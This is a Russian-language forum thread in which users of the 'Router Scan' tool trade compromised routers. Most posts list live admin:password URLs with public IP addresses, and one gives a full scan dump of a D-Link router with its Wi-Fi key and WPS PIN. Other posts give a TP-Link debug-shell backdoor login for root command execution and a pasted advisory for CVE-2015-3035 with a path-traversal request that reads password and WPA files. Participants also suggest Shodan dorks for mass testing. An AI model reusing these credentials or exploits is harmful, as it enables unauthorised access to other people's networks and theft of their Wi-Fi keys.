прога Router Scan

Wive-NG-RTNL - firmware for SNR-CPE-W4n
http://admin:[email protected]/
http://rghost.ru/7RSzdd5KR

 

APRouter
Firmware: WA 2354.2
http://admin:[email protected]|.87/

TOTOLINK
Firmware Version: V4.0
http://admin:[email protected]:8O8O/
http://admin:[email protected]/

 

Добавил.

 

Address: http://92.242.118.21:88/
Time: 0 ms
Authorization: admin:Lg08cObr
Device: D-Link DIR-320, hardware: rev 2B1, firmware: 1.22

хотя в ручную заходит, правда при серфинге по веб морде постоянно требует подтверждения пароля.
если надо config файл сохранил.

 

Несколькими постами ранее уже говорил, дело в капче.

Если одновременно со сканом залогиниться с корректной капчей, парсинг прокатит.

Code:

Address: http://92.242.118.21:88/
Time: 109 ms
Authorization: admin:Lg08cObr
Device: D-Link DIR-320, hardware: rev 2B1, firmware: 1.22
BSSID: 00:24:01:B1:58:C6
ESSID: 1824
Security type: WPA/WPA2
Key: Lg08cObr
WPS Pin: 68438470
LAN IP: 192.168.0.1
LAN Subnet Mask: 255.255.255.0
WAN IP: 172.18.5.53
WAN Subnet Mask: 255.255.255.0
WAN Gateway: 172.18.5.1
Domain Name Servers: 172.18.5.1 8.8.4.4

 

доброго времени суток. заранее прошу извинить - у меня такой, несколько тупой вопрос вы добавляете эксплойты в текущую сборку ( ну ту, которая в архиве на сайте), или в разрабатываемую, которая еще не в паблике?

 

LevelOne
WBR-6000 - Version 1.0 Release 04
http://admin:[email protected]:8O8O/

 

Thomson Router, firmware: STB5.01.51
http://<empty>:[email protected]:8080

Thomson Router, firmware: STB1.53.30
http://<empty>:[email protected]:8080

150Mbps 802.11n Wireless Broadband Router WNRT-617
http://admin:[email protected]:1080

Scientific-Atlanta, Inc.
http://<empty>:<empty>@201.241.165.143:8080
@201.241.183.26:8080

 

может кому пригодится.
извиняюсь, если баян
" дебаг-шелл в устройствах TP-Link WDR740ND, WDR740N, WR743ND, WR842ND, WA-901ND, WR941N, WR941ND, WR1043ND, WR2543ND, MR3220, MR3020, WR841N "

Spoiler: shell

Данная уязвимость позволяет злоумышленнику выполнить произвольный код с root правами. Для эксплуатации уязвимости злоумышленнику достаточно: сформировать HTTP-запрос к /userRpmNatDebugRpm26525557/linux_cmdline.html использовать учётную запись логин osteam, пароль 5up дальше можно выполнять произвольный код с root-правами

Источник: http://weblance.com.ua/blog/160-kriticheskaya-uyazvimost-v-routerah-i-tochkah-dostupa-tp-link.html



Источник: http://weblance.com.ua/blog/160-kriticheskaya-uyazvimost-v-routerah-i-tochkah-dostupa-tp-link.html

 

еще один вопрос возник по ходу дела - никому не попадался роутер TP-LINK TL-WR741ND (Hardware version 5.0) именно v.50. хотелось бы проверить эксплойтик http://www.securityfocus.com/archive/1/archive/1/535240/100/0/threaded на других прошивках срабатывает но не так как нужно. отдает php с кодом 1. неохота возиться с инклудом.хочется -раз-и в дамках

для интересующихся, но не ходящих ( по ссылкам разумеется )

Spoiler: exploit

title: Unauthenticated Local File Disclosure
product: Multiple TP-LINK products (see Vulnerable / tested versions)
vulnerable version: Multiple (see Vulnerable / tested versions)
fixed version: see Solution
CVE number: CVE-2015-3035
impact: Critical
homepage: http://tp-link.com
found: 2015-02-19
by: Stefan Viehböck (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"TP-LINK is a global provider of SOHO & SMB networking products and the World's
No.1 provider of WLAN products, with products available in over 120 countries
to tens of millions customers. Committed to intensive R&D, efficient production
and strict quality management, TP-LINK continues to provide award-winning
networking products in Wireless, ADSL, Routers, Switches, IP Cameras, Powerline
Adapters, Print Servers, Media Converters and Network Adapters for Global
end-users."

Source: http://www.tp-link.us/about/?categoryid=102

Business recommendation:
------------------------
Attackers can read sensitive configuration files without prior authentication.
These files e.g. include the administrator credentials and the WPA passphrase.

TP-LINK has provided fixed firmware which should be installed immediately.

Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, arbitrary local files can be
disclosed. Files that include passwords and other sensitive information can
be accessed.

Proof of concept:
-----------------
The following HTTP request shows how directory traversal can be used to gain
access to files without prior authentication:
========================================================================
=======
GET /login/../../../etc/passwd HTTP/1.1
Host: $host

========================================================================
=======

The server response includes the contents of the file:
========================================================================
=======
HTTP/1.1 200 OK
Server: Router Webserver
Connection: Keep-Alive
Keep-Alive:
Persist:
WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
Content-Length: 683
Content-Type: text/html
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
admin:x:500:500:admin:/home:/bin/sh
guest:x:500:500:guest:/home:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
========================================================================
=======

Several sensitive files can be read. These include:
Files containing Wi-Fi configuration including WPA-passphrase:
/login/../../../tmp/ath.ap_bss
/login/../../../tmp/ath1.ap_bss

A file containing administrator credentials (format: $user:md5($password), which can
be brute-forced very efficiently:
/login/../../../tmp/dropbear/dropbearpwd

Example server response:
========================================================================
=======
HTTP/1.1 200 OK
Server: Router Webserver
Connection: Keep-Alive
Keep-Alive:
Persist:
WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
Content-Length: 56
Content-Type: text/html
username:admin
password:11d0fc2ff3e7862d8a3f9b280e6d390c
========================================================================
=======

Vulnerable / tested versions:
-----------------------------
The vulnerability affects the following products:
TP-LINK Archer C5 (Hardware version 1.2)
TP-LINK Archer C7 (Hardware version 2.0)
TP-LINK Archer C8 (Hardware version 1.0)
TP-LINK Archer C9 (Hardware version 1.0)
TP-LINK TL-WDR3500 (Hardware version 1.0)
TP-LINK TL-WDR3600 (Hardware version 1.0)
TP-LINK TL-WDR4300 (Hardware version 1.0)
TP-LINK TL-WR740N (Hardware version 5.0)
TP-LINK TL-WR741ND (Hardware version 5.0)
TP-LINK TL-WR841N (Hardware version 9.0)
TP-LINK TL-WR841N (Hardware version 10.0)
TP-LINK TL-WR841ND (Hardware version 9.0)
TP-LINK TL-WR841ND (Hardware version 10.0)

Vendor contact timeline:
------------------------
2015-02-19: Contacting vendor through support (at) tp-link (dot) com. [email concealed]
2015-02-24: Resending email as previous ticket has been closed by TP-LINK.
2015-02-24: Contacting technical support engineer of TP-LINK, contact received
by 3rd party.
2015-02-25: Requesting encryption keys, providing affected models.
2015-02-26: No encryption keys available, sending advisory in unencrypted form.
2015-02-28: Vendor confirms vulnerability, provides beta firmware.
2015-03-03: Sending confirmation that beta firmware fixes the vulnerability.
2015-03-06: Vendor is working on release schedule, affected devices.
2015-03-16: Vendor announces that fixed firmware will be released by the end of
March.
2015-03-24: Vendor confirms that firmware releases are on schedule.
2015-04-08: Vendor provides final list of affected products & download URLs.
2015-04-10: Coordinated release of security advisory.

Solution:
---------
Update to the most recent firmware version:
TP-LINK Archer C5 (Hardware version 1.2): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13048
TP-LINK Archer C7 (Hardware version 2.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13008
TP-LINK Archer C8 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13052
TP-LINK Archer C9 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13020
TP-LINK TL-WDR3500 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13018
TP-LINK TL-WDR3600 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13019
TP-LINK TL-WDR4300 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13009
TP-LINK TL-WR740N (Hardware version 5.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13012
TP-LINK TL-WR741ND (Hardware version 5.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13013
TP-LINK TL-WR841N (Hardware version 9.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13033
TP-LINK TL-WR841N (Hardware version 10.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13036
TP-LINK TL-WR841ND (Hardware version 9.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13035
TP-LINK TL-WR841ND (Hardware version 10.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13037

Workaround:
-----------
See solution.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Stefan Viehböck / @2015

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJVJ7e/AAoJEC0t17XG7og/9sAP/RmVaLHdZNLVdaM6fOGqOfcx
WTj3TpN5k8D5e0ZyDbWznsN8UHdvyAW8aXexjHlYJUeiy1syOSDXmohVGi4rmuKB
EmuFrLsZeE2dqlST5QjUZpPDuSm70GUPi87CjJtPZpfYkpJMKD/4YaXXgHpzjbZI
N++ALNNfN2MPtEMkL0lOa3vCznF5PvCbnMA68pwN6nz6djKpt9fv9086OA4PR+zd
5fP5vELnc4idWBMvRqUofrbOoHprglHfyV+NC4JJoC8BA9FexVAiJkZsv0I31vHi
JZtJoHLKxmsTgTEQaifkvZ0Sku02O/tjbflMxpa7pndIPeJ0Nd6YqLC5lwGFdPcp
HAI/BES0U+Nbtfyp/6MLTm7lej2XL2WSziQUgQPPblcZNykmxFBNVLiPrJp4s/Bx
/Pf0iFHA9ycNkssxdH3+eRbYQBY9SXDsd+2ks3TqcNFo82c1shKm4MXVzgpxoDDi
qcN2fQZcPHSSMaqIy2Y3XfgmPlrktfUjqx+hmwvzdGldtr//5m8h+ksMmEf/+3OF
AMRkvxhr/VAY9xzX+xPZRC7FuxGby/MNeR2z6OYQYbyxYSNcZpASAyS1C3VofP/u
K1KZldkimHfJVIxo9+bCAaHJ6jow9XSY+bMo9istunpAXT8xb6wpp/EGP6FJwpsE
molspBTNPGXlLJnKrzpw
=G04Q
-----END PGP SIGNATURE-----

[ reply ]

 

хм интересненько сработало на модели TL-WR841N / TL-WR841ND

 

потому и выложил, что проверил только тестил на 740N

 

В разрабатываемую.

Оффлайн.

На будущее: рекомендую также указывать заголовки (Server, Realm, и т.п.), можно даже дорки на Shodan, чтобы пачками тестировать.

Добавил.

 

сейчас онлайн

 

http://admin:[email protected]:8080 TP-LINK TL-ER604W(UN) <not implemented>
http://admin:[email protected]:80 ASUS RT-N56UB1 не находит пароль сети

http://admin:[email protected]:8080 ASUS INDRIK (RT-N56U ?) не видит вообще wifi сеть
http://admin:[email protected]:80 SpeedsterMMX440W тоже самое

 

Добавил.

 

http://rghost.ru/private/8fzd4FZqG/11aab0cbd010ec57ad065fc1fd1e228a

Сейчас переключился на другой проект, так что залил обновлённые бинарники, с новыми добавленными устройствами, и некоторыми поправками.

Версию пока не менял.

 

Спасибо вам) за новогодний подарок) а что за проект ? Если не секрет)

 

Не секрет, но он далеко от тематики этого форума. Если кому интересно:

Spoiler: Инфа

Участвую в разработке игры Doom 2D Forever (двумерный платформер под Windows)

Репозиторий: https://github.com/pss88/DF
Оф. сайт: http://doom2d.org/

 

Это включает исправление определения BSSID у некоторых моделей. Так что в идеале хотелось бы, чтобы все одновременно перешли на обновленную версию, дабы не плодить дубли в базе 3wifi, а уже имеющиеся можно было бы со временем вычистить. К сожалению, в реальности это вряд ли произойдёт...